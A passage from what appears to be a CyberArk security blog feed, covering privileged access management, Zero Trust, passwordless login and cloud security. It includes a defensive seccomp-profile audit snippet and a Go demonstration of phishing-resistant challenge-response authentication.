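    """Serialize for a compose file: security_opt: ["seccomp:./seccomp-web.json"]."""
    return json.dumps(profile, indent=2)


if __name__ == "__main__":
    profile = make_profile(WEB_ALLOW)
    print("audit findings:", audit(profile))          # []
    print("read ->", lookup(profile, "read"), "| mount ->", lookup(profile, "mount"))
    print(to_json(profile))
```

The audit step is the part worth keeping in a pipeline: it runs just as well on a profile loaded with `json.load` from a repository as on one built here, so a pull request that quietly adds `ptrace` or `bpf` to an allowlist fails the check before the profile reaches a host.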

Technology like eBPF is a great impetus for stability, visibility and security and having a defense in depth approach is a requirement for proactive protection against advanced attacks.  Developers who use eBPF benefit from performance monitoring and load balancing as well as network traffic information and the laundry list of application-specific data that’s generated.

Security teams get visibility into basic user-level actions performed within the shell out of the box, and can get even greater security by leveraging CyberArk Core Privileged Access Security for more granular controls on both Unix and Linux systems.

Using eBPF for system monitoring provides great visibility and minimizes the need for remote privileged access, but where that access is required, it should be managed and controlled. Combining eBPF with CyberArk privileged access management (PAM) solutions provides deep privileged user control and accountability across all Unix/Linux instances, in the cloud or on-premises. Contact us to see a technical demonstration of how the CyberArk solution can help enable your business.

Gold Standard Cybersecurity for the Gig Economy https://www.cyberark.com/blog/gold-standard-cyber-security-for-the-gig-economy/ Tue, 10 Mar 2020 15:22:14 +0000 https://www.cyberark.com/?p=87235 Securing Remote Vendor Access


The ‘gig’ economy is said to be many things – but one thing that isn’t talked about enough is the potential cyber attack vectors it can open up. Instead, news articles and Op-eds variously depict it as symptomatic of the decline in the traditional nine-to-five day (characterised by a stable income and healthcare) or the jet fuel powering the new world economy.

Whatever your views on its positives (or negatives), the trend among companies of hiring independent contractors and freelancers instead of full-time employees is big and getting bigger: the gig economy now accounts for more than 57 million workers in the US alone. With the gig economy now a fixture of the corporate landscape, isn’t it time to make sure it isn’t exposing you to new risks?

If asked to describe the typical gig economy worker, most people would probably cite a part-time Uber or Deliveroo driver, but that doesn’t explain those massive numbers. Even traditional retail and corporate powerhouses now comprise a mix of full-time, part-time and short-term workers to ensure they can remain nimble, cost-effective and able to adapt to changing market conditions in a fast-paced, technology-led environment.

However, there’s another surprising profession that has become a major part of the gig economy – IT. Since IT professionals – from systems administrators to developers and engineers – often need extensive access to their employer’s systems, this can very quickly become a problem for security, especially if that access is privileged.

Of course, companies have good reasons for turning IT jobs into gig work. It is in line with how modern enterprises approach IT in general. Think about how cloud services work. The same way cloud services allow companies to deploy more resources when they’re needed and fewer when they’re not, the gig economy lets companies only field the number of IT professionals they need as their needs change. It’s quick; it’s flexible and it meets the evolving needs of the business.

One thing that participating in the gig economy is not, however, is inherently secure. The old model for cybersecurity was built around a controlled environment, such as the corporate network.  The network perimeter – traditionally the first line of defense – was a known quantity and yes, it had holes, but the location of the weak spots was probably already known. Now, the perimeter is at best distributed and at worst non-existent.

Meanwhile, IT professionals perform some of the more crucial and highly privileged roles in 21st century organizations, because every business relies on information and technology in order to function. It’s assumed that large quantities of critical data and at least a few critical assets will need to be accessed and managed in order for the business to serve customers, meet manufacturing deadlines and more.

It’s common for in-house IT employees to be subject to strict security oversight. However, when these roles are performed by remote third parties, short-term contractors or otherwise not by permanent, trusted staff based in the office, security must adapt to the new threats this poses.

As flexible workers plug into an organization’s network and access sensitive company systems from outside the physical perimeter of the office, organizations need to have strict security protocols in place to properly mitigate the elevated risk that this entails.

They also need to enforce proper controls so remote gig workers are only accessing what they need to, instead of trusting them with sweeping access to everything. Risk factors include accessing networks from personal devices that lack enterprise-grade security or from home networks that could be easily compromised.

According to CyberArk global threat research, 90 percent of organizations allow remote vendor access to their critical systems and 72 percent put remote vendor access in their top 10 security risks. So, this problem is widespread and the risk is understood.  But, is it acted upon? If not, gig economy workers put themselves and their employers at risk of data breaches, leaks of confidential information and more.

Advances in technology mean the shortcomings of existing options – like VPNs – to secure remote workers can now be overcome. Use of biometrics, Zero Trust principles and just-in-time provisioning can and should be employed to reliably authenticate remote vendor access to the most sensitive parts of the corporate network. In the gig economy, where endpoint devices have disparate levels of security and the office environment can be a café, car or home office, cybersecurity needs to match the flexibility of modern working. And it needs to be recognized and implemented.

CyberArk Alero provides secure authentication with the flexibility and ease of use that modern remote workers need by using the remote workers’ own mobile devices for biometric and multi-factor authentication. Learn more about how Alero secures remote access or download the Alero datasheet.

Boldly Go Farther with Greater Efficiency for PAM https://www.cyberark.com/blog/boldly-go-farther-with-greater-efficiency-for-pam/ Thu, 05 Mar 2020 15:05:35 +0000 https://www.cyberark.com/?p=86990 Privileged Access Management (PAM)

CyberArk today announced version 11.3 of its flagship solution for enterprises – the CyberArk Privileged Access Security Solution. Speaking of flagships and enterprises, it turns out that it’s possible to learn a lot about privileged access management (PAM) and the new CyberArk solution from another famous flagship, the Starship Enterprise.

The Enterprise’s mission, “to boldly go where no man has gone before,” surely resonates with modern day enterprises charting a course through the digital economy. These businesses rely today on technology networks linked by privileged access pathways to drive results – and like the Starship Enterprise, they sometimes come under attack. Our vision at CyberArk is to help our customers reduce risk by securing their enterprise through privileged access management (PAM), as leaving privileged pathways unprotected would be “highly illogical” in the words of Mr. Spock.

Version 11.3 of the CyberArk Privileged Access Security Solution introduces several new features to improve PAM flexibility, efficiency and security to help our customers live long and prosper.

New enterprise-ready enhancements and capabilities in Version 11.3 include:

  • Support for More Distributed Vaults: CyberArk now allows customers with multiple data centers to deploy Digital Vaults in up to six geographic locations (up from the previous limit of four Vaults) in a single Distributed Vaults environment. This allows global enterprises to increase availability at the data center level, enabling secure operations across the fleet.
  • Improved Automation Capabilities: Version 11.3 introduces PAM automation capabilities, including:
    • Fully automated upgrades to key CyberArk infrastructure using deployment tools such as Ansible, which allows for less focus on system maintenance.
    • Version 11.3 now supports concurrent logins for applications using the CyberArk REST API, enabling key applications to authenticate multiple times to CyberArk and notably improving the efficiency of automated PAM tasks.
    • Improved import and upload of Privileged Session Manager for Windows connection components via REST API.
  • Improved Threat Analytics Features for Audit and Compliance: Version 11.3 introduces new configuration options and details on risky privileged sessions detected by threat analytics, improving user experience for anyone focused on audit processes. The new features offer additional visibility into risky privileged behavior, providing additional intelligence regarding both malicious insiders and external threats.
  • Endpoint Privilege Manager Enhancements: Endpoint Privilege Manager now offers policy recommendations based on industry best practices for both macOS and Windows devices based on customer environment data and specific event statistics. This facilitates quick and easy implementation of least privilege, application control, and ransomware protection to protect endpoint security.
  • Support for Windows Server 2019: The CyberArk Core Privileged Access Security Solution can now be installed on Windows Server 2019, helping enterprise customers modernize and secure state-of-the-art infrastructure and applications in their hybrid cloud environments.

CyberArk Docs, our online documentation site, now hosts a centralized, simplified REST API Hub to collect information and share best practices for PAM automation across CyberArk customers.

In both Star Trek’s futuristic world and today’s cyber landscape, advanced human and alien (or at least non-human application and machine) threats hide around every corner. The foundation of the USS Enterprise’s success was not only powerful, automated technology capable of adapting to sophisticated attacks, but also an insightful crew with the bandwidth to operate that technology effectively. New features in version 11.3 expand the intelligence and flexibility of enterprise-grade PAM deployments to ready organizations for their digital transformation voyages.

Want to learn more? Contact us for a demo and learn why over 5,300 customers trust CyberArk to deliver comprehensive privileged access management functionality across the galaxy (or at least planet Earth) while delivering a simplified experience to security, operations and end users.

A Brief History of Securing the Hybrid Cloud https://www.cyberark.com/blog/a-brief-history-of-securing-the-hybrid-cloud/ Tue, 03 Mar 2020 14:00:42 +0000 https://www.cyberark.com/?p=86693 Privileged Access Management and Hybrid Cloud

More and more organizations are getting on board with infrastructure as a service and the hybrid cloud and it looks like that trend is only accelerating this year. As hybrid cloud environments become more prevalent, it’s time to look back at the evolution of cloud computing – and, more importantly, how to secure these dynamic environments.

In the early 2000s, Amazon, an e-commerce company going through rapid growth, needed its IT environment to be capable of handling the seasonal and massive fluctuating demands on its IT resources. For most e-commerce companies, consumer demand typically spikes in November and December. Amazon took it upon itself to create a solution to address its dynamic demand and resource needs; that solution was Amazon Web Services (AWS).

Following its launch in 2006, AWS outpaced Amazon’s operating income and tripled in revenue over the next two years. Thus, the public cloud computing market was born. Following Amazon, Google launched Google App Engine in 2008, which later became part of Google Cloud Platform, and Microsoft Azure launched in 2010.

Oftentimes independent groups or business units within an organization choose different public cloud providers to meet their particular requirements including the need for flexibility to support multiple business lines and geographies. Consequently, organizations use services hosted across multiple public cloud, private cloud and on-premises infrastructure, resulting in hybrid environments.

According to the RightScale 2019 State of the Cloud Report, over half of respondents – 54% — have a hybrid cloud strategy. Furthermore, organizations leverage almost five clouds on average. Beyond this, companies leverage Software as a Service (SaaS) applications and Platform as a Service offerings all of which need to be accessed by multiple types of privileged users, expanding the landscape that needs to be secured and increasing the pressure on security teams.

Security in public clouds is a shared responsibility between the public cloud vendor and the organization. Cloud vendors are committed to the security of the cloud infrastructure, including the compute, storage and networking resources, as well as the physical infrastructure. However, the application owner is responsible for protecting the applications, data, OS and other enterprise infrastructure, as well as other assets running in the cloud.  Application owners can’t afford to forget that the security of these elements in the cloud is in their hands.

To protect the cloud environment, start by ensuring that the right users, and only the right users, can access only the applications, cloud infrastructure and cloud platforms they need, and only when they need them. The same is true for hybrid cloud environments, except that the same security measures that keep the cloud safe need to work for both cloud and on-premises environments without slowing anyone down.

 

Privileged Access Management (PAM) and Hybrid Cloud Options

When it comes to securing hybrid environments, enforcing the same privileged access security policies across the entire organization, regardless of infrastructure environment, platform or SaaS application, enhances adoption by easing security policy management. In other words, the same privileged access management (PAM) policies and just-in-time access need to be enforced equally throughout every public, private and on-premises environment for every privileged user. CyberArk delivers solutions that enforce consistent enterprise-wide security policies across cloud and hybrid environments.

Want to learn more about how to secure the cloud journey? Learn how CyberArk protects cloud workloads or watch a webinar on best practices for securing cloud based applications and infrastructure.

Can We Really Make the World a Passwordless Place? https://www.cyberark.com/blog/can-we-really-make-the-world-a-passwordless-place/ Tue, 25 Feb 2020 19:19:25 +0000 https://www.cyberark.com/?p=86462

The average person uses around 100 username and password combinations. However, while many security teams recommend that business users create individual, complex and strong passwords for all their accounts, many fail to follow this advice. As a result, many passwords are either weak or frequently re-used. With the vast majority of cyber attacks involving compromised credentials, weak passwords can directly result in data leaks, cyber attacks and theft of intellectual property.

Try this for a password – the world’s longest place name, a hill in New Zealand with 85 letters.

In fact, malicious attackers can access millions of leaked passwords on public sites. Having a password compromised is upsetting, but what’s more concerning is the longer-term impact of that attack. Most people are guilty of re-using passwords, but if your email was infiltrated, for example, and you use that password for other online accounts, all of them can be compromised too.

Once compromised or stolen, credentials can be sold online, and attackers count on the fact that most of us re-use our passwords. A purchased password for one account is often used in other attacks to access valuable information on other sites.

On the other hand, tactics like phishing expose a clear “people” problem. According to the Verizon 2019 Data Breach Investigations Report, 32% of all breaches involved phishing and 33% included social engineering attacks that deceive human users.

Increasing Security with Authentication

Two-factor authentication (2FA) and multifactor authentication (MFA) were introduced to overcome these password-related security limitations. Both methods ensure that a person’s identity is authenticated using both something they know (the password) and something they have (such as an app on their phone) or something they are (a form of biometric authentication like a thumbprint). Even if a password is compromised, attackers still need another factor to gain access.

While these methods reinforce security, there are still some administrators and operations leaders who worry that the additional steps can get in the way of productivity. This is especially true today in the world of developers and cloud architects who rely on speed and agility. The problem is that the access those developers and architects have is too critical to be left vulnerable.

Since they have access to valuable secrets and full control over their environments, developers and architects are some of the most privileged users within an organization. Compromising a developer is a shortcut for attackers to gain immediate elevated access to the most critical information an organization has – hence the push for additional authentication.

While we always recommend using MFA when accessing critical systems, without the proper management and monitoring, passwords or credentials can still be a weak link. Storing and rotating credentials in a digital password vault or credential manager is another key method for organizations to solve the ‘people’ problem, as it prevents password re-use.

In addition, organizations are also facing high stakes and complex challenges from non-password credentials including SSH or Cloud API keys and DevOps secrets that provide access to different systems and applications. Credential vaulting and rotation prevents re-use, while also eliminating the challenges of manual credential management.

Securely granting access to different servers on-premises, different cloud providers, and most importantly, staying compliant with regulations is not an easy task. Especially when security leaders need to make sure that the business keeps working and security does not interfere with user activity.

The question then becomes: Is there an easy way to authenticate without remembering a password – and – is there a way to secure authentication while keeping the process simple?

Enter: Passwordless Authentication

‘Passwordless’ does not mean that passwords cease to exist; it simply means that end-users and application accounts are not exposed directly to the credentials needed to access critical systems. The goal of passwordless authentication is to improve security and make it more convenient and simpler for users to access resources.

With passwordless authentication, users do not need to memorize or enter passwords to log in to applications. Instead, access is granted according to user permissions or something that can’t be obtained by anyone other than the correct user, such as a biometric identification. If a password is never exposed to the user, then that password can never be stolen and, since endpoints are some of the most difficult systems to fully secure, this is a sound strategy.

Personal user passwords can be protected using passwordless methods, and several are growing in popularity, such as Windows Hello and FIDO-compliant websites and devices.

With this approach, IT and Security teams can rest assured that user access is secured and there are no reused or shared passwords and, therefore, attackers can’t phish for users’ passwords or access. User authentication data is never stored within the system as a password would be, so even someone with access to the system can’t retrieve the authentication data – giving passwordless solutions a key security advantage.

This addresses the problem of protecting assets from sophisticated cyber attacks involving credential harvesting, which commonly start with phishing attacks or with a weak or re-used password. The end result is a positive user experience and strong security.
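To make the two claims above concrete (nothing for an attacker to retrieve from the server, and nothing useful to phish), here is a minimal FIDO-style challenge-response login, written as an added example for this post rather than CyberArk’s or any vendor’s code. The relying-party origin login.example, the phishing origin and the user alice are made up; the server stores only a public key, each challenge is single-use, and the signature is bound to the origin the browser actually loaded.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
)

// RelyingParty is the server side. Its user table holds only public keys,
// so a dump of this table gives an attacker nothing they can log in with.
type RelyingParty struct {
	ID         string                       // origin the credentials are bound to
	pubKeys    map[string]ed25519.PublicKey // user -> registered public key
	challenges map[string][]byte            // user -> outstanding one-time challenge
}

func NewRelyingParty(id string) *RelyingParty {
	return &RelyingParty{
		ID:         id,
		pubKeys:    make(map[string]ed25519.PublicKey),
		challenges: make(map[string][]byte),
	}
}

// Authenticator models the user's device (a FIDO key, Windows Hello, ...).
// The private key is generated here and never leaves it.
type Authenticator struct {
	priv ed25519.PrivateKey
}

// Register creates a key pair on the device and hands the server only the
// public half. There is no shared secret for the user to type or re-use.
func Register(rp *RelyingParty, user string) (*Authenticator, error) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return nil, err
	}
	rp.pubKeys[user] = pub
	return &Authenticator{priv: priv}, nil
}

// BeginLogin issues a fresh random challenge that is valid for one attempt.
func (rp *RelyingParty) BeginLogin(user string) ([]byte, error) {
	if _, ok := rp.pubKeys[user]; !ok {
		return nil, errors.New("unknown user")
	}
	c := make([]byte, 32)
	if _, err := rand.Read(c); err != nil {
		return nil, err
	}
	rp.challenges[user] = c
	return c, nil
}

// assertionData is what gets signed: the challenge bound to the origin the
// browser actually loaded. Binding the origin is what defeats phishing.
func assertionData(origin string, challenge []byte) []byte {
	h := sha256.New()
	h.Write([]byte(origin))
	h.Write([]byte{0}) // separator so origin/challenge boundaries are unambiguous
	h.Write(challenge)
	return h.Sum(nil)
}

// Sign produces the login assertion. In a real deployment the origin comes
// from the browser, not from the web page, so a phishing site cannot lie about it.
func (a *Authenticator) Sign(origin string, challenge []byte) []byte {
	return ed25519.Sign(a.priv, assertionData(origin, challenge))
}

// FinishLogin verifies the assertion against the stored public key and the
// server's own origin, and consumes the challenge so it cannot be replayed.
func (rp *RelyingParty) FinishLogin(user string, sig []byte) error {
	pub, ok := rp.pubKeys[user]
	if !ok {
		return errors.New("unknown user")
	}
	c, ok := rp.challenges[user]
	if !ok {
		return errors.New("no outstanding challenge (replay?)")
	}
	delete(rp.challenges, user)
	if !ed25519.Verify(pub, assertionData(rp.ID, c), sig) {
		return errors.New("assertion does not verify for this origin")
	}
	return nil
}

func main() {
	rp := NewRelyingParty("login.example") // constructed relying-party origin
	dev, _ := Register(rp, "alice")        // constructed user

	c, _ := rp.BeginLogin("alice")
	sig := dev.Sign("login.example", c)
	fmt.Println("genuine login:", rp.FinishLogin("alice", sig))       // <nil>
	fmt.Println("replayed assertion:", rp.FinishLogin("alice", sig))  // error: challenge consumed

	// Phishing: the attacker relays the real challenge, but the victim's browser
	// signs it for the origin it is really on, so the real site rejects it.
	c2, _ := rp.BeginLogin("alice")
	sig2 := dev.Sign("login.example.phish.test", c2)
	fmt.Println("relayed from phishing site:", rp.FinishLogin("alice", sig2)) // error
}
```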

Passwordless Authentication and Privileged Access Management (PAM)

We’ve established that passwordless can be great for personal user passwords, but what about securing access to extremely sensitive assets? How can businesses grant passwordless access to the root account of a newly provisioned machine or a service account running mission-critical services?

These forms of privileged access represent the greatest risk to organizations and need even stronger security controls than an ordinary passwordless tool can provide. Access to tier 1 and tier 0 systems, which contain the most privileged assets in an organization, should be protected with a comprehensive Privileged Access Management (PAM) solution. These solutions can vault and isolate credentials so users never know them – making them passwordless – but, also provide additional layers of security like session monitoring, recordings and analytics-based threat detection.

How can organizations tier access between personal users, tier 1 admin users and tier 0 systems?

While personal user passwords can be protected using standard passwordless methods, organizations should protect their service accounts, admins and non-human identities with stronger, dedicated solutions. However, whether securing access to critical information or authenticating individual users, the basic rules remain the same:

  • The user shouldn’t know the password.
  • The user should have a simplified streamlined experience.
  • Secrets should be protected and properly rotated.
  • Access to these secrets should be secured and monitored.

This approach can get us closer to a world where passwords (or keys) are not the weakest link anymore – a passwordless world, a more secure world.

Wonder how this can be achieved?

Check out the CyberArk Privileged Access Security Solution for more details or learn more about CyberArk Alero, our newest offering, which provides native, passwordless authentication for remote users.

CISO View Insights: Securely Scaling RPA Initiatives https://www.cyberark.com/blog/ciso-view-insights-securely-scaling-rpa-initiatives/ Wed, 19 Feb 2020 13:50:31 +0000 https://www.cyberark.com/?p=86287

According to a recent Deloitte study, robotic process automation (RPA) continues to meet and exceed expectations across multiple business dimensions including improved compliance (92%), improved quality and accuracy (90%), improved productivity (86%) and reduced costs (69%).

But from a cybersecurity perspective, RPA represents a new and attractive attack surface for external attackers and malicious insiders. RPA technologies—and the humans who control them—are often given broad privileged access to highly sensitive data and a variety of business critical applications that open up the enterprise to unnecessary risk. And yet, according to our threat landscape survey, less than half of organizations have a privileged access management (PAM) strategy in place for digital transformation technologies like RPA.

If you’re a security leader grappling with the challenge of how to provide robots with privileged access while safeguarding the business, this report is a must-read. Regardless of where you are in your RPA journey—from planning to implementation to extending use cases—this new CISO View report can help accelerate efforts to enable automation while effectively managing the risks. Learn more by watching the video below.

CyberArk, in conjunction with independent research firm Robinson Insight, has assembled an expert panel of Chief Information Security Officers (CISOs) from the world’s leading organizations to examine attack techniques, provide insights on why organizations often underestimate the risks of RPA-related privileged access and share practical guidance on reducing RPA risk based on their first-hand experiences.

Here are some of their recommendations.

Five Top CISO Recommendations for Securely Driving Innovation through RPA

  1. Be proactive in setting security standards for RPA initiatives. Understandably, organizations are eager to get started with RPA as part of their push toward digital transformation, but security cannot be an afterthought—it must be built in from the start.
  2. Strictly limit access for reprogramming robots. Anyone with the right combination of permissions in the RPA tool can reprogram robots—and potentially cause major issues.
  3. Automate management of credentials used by robots. At the scale and speed of robotic processes, it’s nearly impossible to manage privileged credentials manually.
  4. Establish robust processes for monitoring RPA activity. A compromised robot can do a lot of damage—and fast.
  5. Focus conversations with stakeholders on business opportunities and efficiency. Implementing an RPA security strategy will require stakeholder involvement across the enterprise.

Protecting Privileged Access in Robotic Process Automation

These five recommendations form the foundation of a playbook for benefiting from the opportunity of RPA while keeping privileged access protected. They are just a few of the many insights and actionable recommendations for security leaders found in the fourth CISO View report. On many RPA topics, CISOs on this research panel were in broad agreement. For other issues, this report captures diverse points of view, reflecting varying stages of RPA deployment and a range of organizational cultures.

Members of the RPA CISO View research panel include Global 1000 organizations such as Asian Development Bank, GIC Private Limited, Highmark Health, Kellogg Company, Lockheed Martin Corporation, Orange Business Services, Pearson, Rockwell Automation, Royal Bank of Canada and T-Systems International.

The full CISO View series brings together leading CISOs for peer-to-peer information sharing to help security teams build effective cybersecurity programs.

Learn More: Download the Report and Explore RPA Security Resources

SOC It 2 Me: CyberArk Achieves SOC 2 Type 2 Compliance https://www.cyberark.com/blog/soc-it-2-me-cyberark-achieves-soc-2-type-2-compliance/ Tue, 11 Feb 2020 17:40:40 +0000 https://www.cyberark.com/?p=85878

Service Organization Control (SOC) 2 is an auditing procedure that ensures service providers are securely managing data to protect the interests of their customers, their customers’ customers and so on. This stringent independent audit seeks to determine the suitability of the design and operating effectiveness of controls that a SaaS vendor implements for its services.

As we continue to bolster and enhance our best-in-breed Privileged Access Management (PAM) as a Service portfolio, we are proud to announce that CyberArk recently attained SOC 2 Type 2 compliance for both Endpoint Privilege Manager and CyberArk Privilege Cloud.

This is a momentous accomplishment and here’s why. The audit tests over 30 unique controls, principles and criteria. These include, but are not limited to, overall commitment to organizational integrity, ethical values and, of course, specificity into how data is controlled and secured. SOC 2 is a comprehensive audit that signifies to the market that complying organizations take the data privacy of their “as a Service” offerings seriously.

Other market solutions that fall back on major cloud hosting providers like AWS, Azure and more to claim SOC 2 compliance are not as mature or secure as services that have obtained these certifications independently. CyberArk has always been committed to providing customers with the most secure solutions to fit their needs and achieving SOC 2 Type 2 compliance is another proof point for that mission.

Part of the CyberArk PAM as a Service portfolio, Endpoint Privilege Manager (EPM) helps organizations reduce the risk of unmanaged administrative access on Windows and Mac endpoints. It provides the right tools to implement the principle of least privilege and helps to effectively reduce the attack surface and transparently mitigate the risk of a data breach without impacting productivity. EPM combines privilege management, privilege threat protection and numerous integrations to reduce the risk of malware infection and lateral movement without having adverse impacts on IT and security teams.

CyberArk Privilege Cloud is built to protect, control and monitor privileged access across cloud and hybrid environments. Based on CyberArk’s extensive experience protecting privileged access, the solution helps organizations efficiently manage privileged account credentials and access rights, proactively monitor and control privileged account activity and quickly respond to threats – all without the need to manage additional on-premises infrastructure. This modern, cloud-based service accelerates time-to-value and leverages cloud economics to efficiently and effectively address customers’ privileged access management needs.

The recent SOC 2 audit indicates that organizations can leverage CyberArk services’ controls and design to operate effectively. The audit also confirms that these two services operate effectively and have the requisite service commitments and system requirements based on the “applicable trust services criteria” — making them viable options for any organization looking to use CyberArk as a Service offerings. As organizations continue to trend towards SaaS applications and security solutions, SOC 2 compliance for specific services can be a starting point in evaluating SaaS providers.

Learn more about Privilege Cloud and Endpoint Privilege Manager now.

Preventing Interceptions in the Cybersecurity Super Bowl https://www.cyberark.com/blog/preventing-interceptions-in-the-cybersecurity-super-bowl/ Tue, 04 Feb 2020 17:27:48 +0000 https://www.cyberark.com/?p=85146

Few events can change the momentum of a football game like a turnover in a critical moment. Unfortunately, ahead of their clash in last Sunday’s Super Bowl, the Kansas City Chiefs and San Francisco 49ers had one such moment when cyber attackers took over the teams’ Twitter accounts as well as the official account of the National Football League.

The group OurMine took responsibility for the cyber attack. In all, 15 NFL teams had their Twitter or Instagram accounts compromised, alongside the accounts of sports media giant ESPN and the UFC mixed martial arts organization. The Super Bowl is the biggest event on the American sports calendar, so it’s not surprising that precisely during their moment in the spotlight, the NFL, the Chiefs and the 49ers were attractive targets for attackers seeking a spot on that national stage by causing disruption.

The attacks emphasize the importance of cybersecurity for social media accounts and other web applications, not only for sports teams and media companies, but any organization. Once in control of team accounts, the attackers spread misinformation about individual teams. Meanwhile, media reports of the attacks spread widely and the NFL and ESPN felt the need to issue public statements confirming they were working with law enforcement to address the situation.

While the precise attack methodologies are not fully public, both OurMine and Twitter confirmed the data breach occurred through a third-party platform. This reinforces awareness that, as adoption of web and cloud applications expands, so too does the attack surface.

With the prevalence of unmanaged, unmonitored and, often, shared accounts and passwords, many organizations lack proper controls over social media platforms. Yet, a compromised account can be potentially catastrophic to a brand’s reputation and that needs to be taken into consideration. Attacks can lead to the unauthorized publication of offensive content, or leaks of confidential financial or personal information.

Social media account credentials should be securely stored, rotated and isolated from employee workstations to minimize these risks. Session isolation and management can add additional accountability to privileged sessions on corporate accounts, helping security teams satisfy audit requirements and investigate security events.

The role of a third-party social media management application in these breaches is even more of a concern. These applications should be treated as highly sensitive corporate resources. As such, they should be secured with privileged access management solutions, which provide security where it’s most needed – protecting highly sought-after privileged access to vital information and applications from compromise.

Football, it’s often said, is a game of inches, in which the difference between winning and losing comes down to just a few key moments. To win a close game, teams must ensure they limit unnecessary turnovers that can give opponents momentum or the upper hand. The same could be said for cybersecurity. When facing complex threats, organizations should take a risk-based approach and prioritize privileged access management.

Looking to change the game and better protect your organization from threats? Learn how to execute the playbook for privileged access management.

The One-Two Punch of Zero Trust. Verify Every User, Validate Every Device. https://www.cyberark.com/blog/the-one-two-punch-of-zero-trust-verify-every-user-validate-every-device/ Sun, 02 Feb 2020 20:56:46 +0000 https://www.cyberark.com/?p=98931

Data breaches most often originate from a remote endpoint or device that shouldn’t have access to the breached resources in the first place — often involving nothing more than a stolen username and password. Wouldn’t it be nice if we could reduce the attack surface from every computer or device on earth to only the protected systems that should have access in the first place? That may sound like a pipe dream, but the reality might be closer than you think with the right setup.

As I wrote before, security starts with protecting users. First, we must verify every user to make sure we know who they are and that they only have access to what they need. This verification is done through adaptive multi-factor authentication and tools like single sign-on, coupled with behavior-based machine learning that can make intelligent access decisions in real time based on user context and risk. With that in place, we’ve already dramatically reduced the attack surface so that an attacker who has a stolen password can’t simply log in from anywhere, or reuse that same login credential over and over again.

Verifying every user is an important first step. However, after that, the challenge remains that there are still many ways that applications, systems or networks can be compromised. Anyone with the right credentials can still successfully log on. What happens when a bad guy has acquired both the user’s login credentials and a clone of the user’s device, as is the case with the phenomenon of SIM-swapping? MFA alone may not protect against that scenario.

So how can you take your security posture to the next level to protect against this? The answer is simple. If “verify every user” represents your leading left-hand jab, then “validate every device” is the follow-up right cross of a Zero Trust strategy. Here’s how to master the Zero Trust one-two punch combo to land a devastating blow to the bad guys’ chance of breaking through your guard.

Come out swinging when it comes to device context and security

Everything online typically comes from accessing a device, so we should care a lot about the security posture and permissions that each device has. Organizations wouldn’t want some rogue server operating on their network, so why then a rogue mobile device or laptop?

But understanding every computer or mobile device that might have access is becoming increasingly difficult in a world where our professional and personal lives are more intertwined than ever before. We use our personal laptops, smartphones, and tablets to access work apps or emails after hours and at home, on the road, or even 30,000 feet in the air. To suddenly cut-off that access for pre-authorized, work-issued devices would be a huge knock to users’ productivity. That’s where the Zero Trust model comes in.

Instead, we want to make sure that every device is being used in a secure manner. It should have a screen-lock policy enforced and proper credentials – because we don’t want passersby or someone who steals the device to use it, get in, and establish repeatable access. Configure device access to reflect best practices – each device should only do what it needs to do. This is done through device management capabilities, which many companies have tried to buy separately for each system. However, a next-gen access approach integrates these capabilities into the system so that we know good security policy is always baked into each and every device that gains access.

Roll with the punches using next-gen access

Once we know that a device has the right security posture and the user is the real deal, this can be used as a proxy for all sorts of context. User behavior thus becomes a powerful new technique to make smarter access decisions.

Today, Zero Trust empowered by next-gen access technology (like Idaptive) can use location or other behaviors to determine whether to grant instant access or introduce additional hurdles to confirm the user’s identity. In the future, we’ll be able to use even more behaviors of the user on the device for context – such as whether they’re typing at a normal pace or moving their mouse as they usually do. This is called behavioral biometrics, and it is important because it could tell whether the person using the device is real, and make sure it’s not a rogue virus or trojan that has taken the machine or is pretending to be the user.

All of these add up to whether we can trust the device, and trust the user on the device, and therefore allow it to have the access that it’s requesting. Recently, this has been much more difficult to do because the modern business is no longer a bunch of PCs chained to a desk in a room. All workers today have laptops and their own mobile devices, and try to access things remotely. We even have people other than direct employees – such as partners, other vendors or third-party consultants – that all need access to our apps and services as well. That complexity requires a system that makes sure what is let in is both 1) in good security posture, and 2) used by the right people.

In our modern threatscape, the barriers to keep the bad guys out are no longer firewalls. Resources are increasingly located outside of physical walls in the cloud, off-site databases, or partner systems. There’s no longer the ability to put a security barrier on a remote SaaS system your organization doesn’t own, or to restrict access to only a predetermined set of devices.

Because our apps, services, and systems are so widespread, we need to spread access control to users and their devices. That means making sure we verify every user and validate every device with every login. That’s the one-two punch of Zero Trust.

Stay tuned. In my next blog post, I’ll spell out the ways that an organization can “intelligently limit access” within the Zero Trust framework.

Read the Zero Trust series here:

Zero Trust Series – 1 What Is Zero Trust and Why Is it So Important?

Zero Trust Series – 2 Like the Night King, Perimeter Defense is Dead

Zero Trust Series – 3 Imposter Syndrome: Why You Can’t Separate the “Good Guys” from the “Bad Guys”

Zero Trust Series – 4 Passwords are Just one Piece of the Cybersecurity Puzzle

Zero Trust Series – 5 The Future of Cybersecurity is Artificial: Intelligence Will Transform Enterprise Governance

Zero Trust Series – 6 Protect, Detect, Deter, Respond is Not a Security Strategy.

Zero Trust Series – 7 Upping the Security Ante: How to Get Teams’ Buy-in for Zero Trust

Zero Trust Series – 8 Next-Gen Access and Zero Trust are the PB&J of Security

Zero Trust Series – 9 Passwords Need Fixing. Zero Trust is the Solution.

Zero Trust Series – 10 The One-Two Punch of Zero Trust. Verify Every User, Validate Every Device.

Zero Trust Series – 11 “Should I Stay or Should I Go?” Artificial Intelligence (And The Clash) has the Answer to Your Employee Access Dilemma.

Zero Trust Series – 12 Grow Up! Plotting Your Path Along the Zero Trust Maturity Model

NSA Offers Guidance for Improving Cloud Security https://www.cyberark.com/blog/nsa-offers-guidance-for-improving-cloud-security/ Thu, 30 Jan 2020 21:21:42 +0000 https://www.cyberark.com/?p=84982

Last week, the US National Security Agency (NSA) released new guidance on mitigating cloud vulnerabilities to help organizations as they consider and deploy public cloud services.

We’ve been talking about the importance of cloud security for quite some time now, but following a string of highly publicized cloud-related attacks, this guidance comes at a critical time. The core of the NSA document is that organizations must consider cyber risks to cloud resources just as they would in an on-premises environment – including how they approach privileged access management. This message reinforces our long-held view that no matter where they “live” – on-premises or in the cloud – privileged accounts must be protected.

While the NSA’s recommendations focus solely on cloud-native environments, most enterprises today operate in a hybrid environment – with some workloads on-premises and others in the cloud. The NSA guidance itself provides valuable insights into securing cloud environments, but this guidance should always be considered as part of a holistic approach to security.

That being said, let’s dig into the NSA’s recommendations.

Security Guidance for the Public Cloud

